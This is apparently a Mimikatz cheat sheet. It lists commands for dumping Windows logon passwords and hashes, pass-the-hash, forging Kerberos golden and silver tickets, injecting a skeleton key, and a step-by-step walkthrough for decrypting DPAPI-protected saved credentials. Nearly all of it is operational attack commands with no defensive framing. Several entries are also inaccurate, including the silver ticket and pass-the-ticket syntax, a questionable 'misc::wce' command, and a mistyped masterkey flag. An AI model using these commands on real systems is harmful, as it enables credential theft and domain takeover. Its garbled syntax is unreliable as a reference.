Dumping passwords with Mimikatz

Using MimiKatz to Obtain Credentials

Mimikatz Cheat Sheet

Privilege Escalation

Get system

privilege::debug
token::elevate

Credential Dumping

Dump credentials

sekurlsa::logonpasswords

Dump hashes

sekurlsa::hashes

Pass-the-Hash

Pass-the-Hash (NTLM)

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>

Kerberos Ticket Attacks

List Kerberos tickets

kerberos::list

Export Kerberos tickets

kerberos::list /export

Golden Ticket

Create Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>

Silver Ticket

Create Silver Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:<ticket_file>

Skeleton Key

Inject Skeleton Key

misc::skeleton

Windows Credentials Editor (WCE)

Inject WCE

misc::wce

Pass-the-Ticket

Pass-the-Ticket (Kerberos)

sekurlsa::pth /user:<username> /domain:<domain> /rc4:<rc4_hash>

Miscellaneous

Dump LSASS Memory

sekurlsa::minidump <output_file.dmp>

Exit Mimikatz

exit

Enumerating Credential Directories

First, enumerate all directories inside C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\:

C:\Users\USERNAME\AppData\Roaming\Microsoft\Credentials>dir /a /q

 Volume in drive C has no label.
 Volume Serial Number is C626-9388

 Directory of C:\Users\USERNAME\AppData\Roaming\Microsoft\Credentials

05/09/2023  03:14 PM    <DIR>          OFFICE\USERNAME          .
01/18/2024  09:34 AM    <DIR>          OFFICE\USERNAME          ..
05/09/2023  01:08 PM               358 OFFICE\USERNAME          18A1927A997A794B65E9849883AC3F3E
05/09/2023  03:03 PM               398 OFFICE\USERNAME          84F1CAEEBF466550F4967858F9353FB4
01/18/2024  11:53 AM               374 OFFICE\USERNAME          E76CCA3670CD9BB98DF79E0A8D176F1E
               3 File(s)          1,130 bytes
               2 Dir(s)   4,465,692,672 bytes free

Decrypting Credentials with MimiKatz

Use MimiKatz to decrypt credentials from a specific file (e.g., 84F1CAEEBF466550F4967858F9353FB4):

mimikatz # dpapi::cred /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4

This command will provide a guidMasterKey for future use.

Enumerating Protected Directories

Next, enumerate directories inside C:\Users\USERNAME\appdata\roaming\microsoft\protect\:

C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect>dir /a

 Directory of C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect

05/04/2023  09:58 AM    <DIR>          .
01/18/2024  09:34 AM    <DIR>          ..
05/02/2023  03:13 PM                24 CREDHIST
01/17/2024  03:43 PM    <DIR>          S-1-5-21-1199398058-4196589450-691661856-1107
01/17/2024  04:06 PM                76 SYNCHIST
               2 File(s)            100 bytes
               3 Dir(s)   4,463,857,664 bytes free

Identify the SID associated with the directories, e.g., S-1-5-21-1199398058-4196589450-691661856-1107.

Decrypting Master Key

Using MimiKatz, decrypt the master key associated with the guidMasterKey within the identified SID directory:

mimikatz # dpapi::masterkey /in:C:\Users\USERNAME\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc

Extract the key provided in the output.

Decrypting Credentials with Master Key

Finally, decrypt credentials using the obtained master key:

mimikatz # dpapi::cred /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\credentials\XXXXXX /masterkey::<key>

Replace XXXXXX with the appropriate credential file and <key> with the master key obtained earlier.